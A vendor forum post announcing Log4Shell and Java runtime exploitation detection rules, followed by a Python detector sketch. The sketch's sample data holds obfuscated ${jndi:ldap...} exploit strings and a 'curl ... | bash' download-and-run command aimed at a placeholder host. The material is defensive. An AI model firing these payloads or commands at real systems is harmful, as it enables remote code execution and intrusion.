TomasP (ESET Moderators), posted December 16, 2021

Hello everyone,

The recently discovered Log4j remote code execution vulnerability has affected organizations, ESET customers and their IT teams around the globe, and as cybersecurity professionals we need to ensure their safety. Our Research & Threat Analysis team has responded rapidly and done a great job of creating a package of 4 rules for detection of Log4j exploitation and more general Java runtime exploitation. We advise importing these rules (the import is done simply from the Admin -> Detection Rules -> Import section of EEI, as described here). These rules will also be included in the upcoming hotfix for EEI 1.6, but we are making them available to you:

- Possible Log4Shell (CVE-2021-44228) exploitation [D0532a]
- Possible Log4Shell (CVE-2021-44228) exploitation [D0532b]
- Potential Java Runtime exploitation [E0461]
- Java Runtime executing suspicious script/command interpreter [E0462]

The first two rules are designed to detect the exploit itself, so the false positive count should be absolutely minimal. However, these rules use an experimental feature of EEI which is not currently fully supported, so the detection may not work in 100% of cases. E.g. when there is a detection already reported on the network layer, the rule in EEI will not be triggered (but in this case you should have a detection from at least one source, and protection is in place). Because of the way the feature is implemented, it is more reliable when executed as a re-run task for a retrospective threat hunt.

The last two rules are focused on more general types of cases, i.e. general exploitation of the Java Runtime, not only by CVE-2021-44228. That means those rules may generate occasional false positives in cases where some legitimate Java application executes system components in a way that may indicate attacker activity.
We have tested these rules so that they do not produce an excessive number of false positives, but in case you observe an unusual amount of FPs in your environment, please report them back to us. The rule pack itself can be found here.

Thank you.
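The two detection ideas the post describes, the Log4Shell-specific case (a `${jndi:...}` lookup, usually hidden behind nested Log4j lookups) and the generic case (a JVM spawning a script or command interpreter), sketched in Python as an added example. This is not ESET's rule logic and not code from the post; the EEI rules themselves are only named above. The log lines and process events are constructed for the example, the `203.0.113.0/24` addresses are a documentation range, and the event field names `parent_image`, `image` and `command_line` are assumptions about an EDR telemetry schema.

```python
import re
from typing import Dict, List, Optional

# Innermost ${...} lookup: a body that contains no nested "${", "{" or "}".
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# A jndi: lookup followed by one of the protocols seen in Log4Shell payloads.
_JNDI_HIT = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\b", re.IGNORECASE
)


def _resolve_one(match: "re.Match[str]") -> str:
    """Collapse one innermost lookup the way Log4j 2 substitution would,
    emulating only the lookups attackers use to hide the word "jndi":
    the ${name:-default} default-value syntax and ${lower:}/${upper:}.
    Everything else (jndi:, ctx:, date:, ...) is kept verbatim."""
    body = match.group(1)
    if ":-" in body:                      # ${::-j}, ${env:NOPE:-j} -> "j"
        return body.split(":-", 1)[1]
    kind, sep, rest = body.partition(":")
    if sep and kind.lower() == "lower":   # ${lower:J} -> "j"
        return rest.lower()
    if sep and kind.lower() == "upper":   # ${upper:n} -> "N"
        return rest.upper()
    return match.group(0)


def normalize_lookups(text: str, max_rounds: int = 50) -> str:
    """Resolve nested lookups inside-out until the string stops changing."""
    for _ in range(max_rounds):
        resolved = _INNERMOST.sub(_resolve_one, text)
        if resolved == text:
            break
        text = resolved
    return text


def is_jndi_lookup(text: str) -> bool:
    """True if the de-obfuscated text still carries a ${jndi:<proto>...} lookup."""
    return _JNDI_HIT.search(normalize_lookups(text)) is not None


def scan_log_lines(lines: List[str]) -> List[int]:
    """Indices of lines that would be flagged (the Log4Shell-specific case)."""
    return [i for i, line in enumerate(lines) if is_jndi_lookup(line)]


# --- generic case: a JVM spawning a script/command interpreter --------------

_JAVA_IMAGES = {"java", "javaw", "java.exe", "javaw.exe"}
_INTERPRETERS = {
    "sh", "bash", "dash", "zsh", "ksh",
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "python", "python3", "perl", "ruby",
}


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def classify_process_event(event: Dict[str, str]) -> Optional[str]:
    """Label a process-creation event when its parent is a JVM and the child is
    an interpreter; returns None otherwise. Field names are an assumption."""
    if _basename(event["parent_image"]) not in _JAVA_IMAGES:
        return None
    if _basename(event["image"]) in _INTERPRETERS:
        return "java-runtime-spawns-interpreter"
    return None


def flag_process_events(events: List[Dict[str, str]]) -> List[int]:
    return [i for i, e in enumerate(events) if classify_process_event(e)]


# Constructed samples (not real traffic); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG_LINES = [
    'GET /login HTTP/1.1 ua="Mozilla/5.0"',
    'GET / HTTP/1.1 ua="${jndi:ldap://203.0.113.5:1389/a}"',
    'GET / HTTP/1.1 ua="${${lower:j}${upper:n}${lower:d}i:${::-l}${::-d}ap://203.0.113.5/x}"',
    'GET / HTTP/1.1 ua="${${env:NOPE:-j}ndi:${::-r}mi://203.0.113.5:1099/o}"',
    "INFO user=${ctx:user} logged in at ${date:HH:mm:ss}",
]

SAMPLE_PROCESS_EVENTS = [
    {"parent_image": "/usr/lib/jvm/java-11-openjdk/bin/java", "image": "/bin/sh",
     "command_line": "sh -c 'curl -s http://203.0.113.5/x | bash'"},
    {"parent_image": r"C:\Program Files\Java\jre\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
    {"parent_image": "/usr/lib/jvm/java-11-openjdk/bin/java", "image": "/usr/bin/git",
     "command_line": "git rev-parse HEAD"},
    {"parent_image": "/bin/bash", "image": "/bin/sh", "command_line": "sh ./build.sh"},
]

if __name__ == "__main__":
    for i in scan_log_lines(SAMPLE_LOG_LINES):
        print("log4shell:", SAMPLE_LOG_LINES[i], "->", normalize_lookups(SAMPLE_LOG_LINES[i]))
    for i in flag_process_events(SAMPLE_PROCESS_EVENTS):
        print("java-runtime:", SAMPLE_PROCESS_EVENTS[i]["command_line"])
```

The two halves illustrate the trade-off the post describes. Matching a `jndi:` lookup after de-obfuscation is exploit-specific, so a hit is close to unambiguous; the parent/child check is generic and will fire on legitimate Java software that shells out (a build tool running `sh`, for instance), which is exactly the kind of false positive the post asks you to report and tune. On a real deployment, the log-line half is also the one worth re-running over retained logs, since a request that was blocked upstream never reaches the JVM's own telemetry.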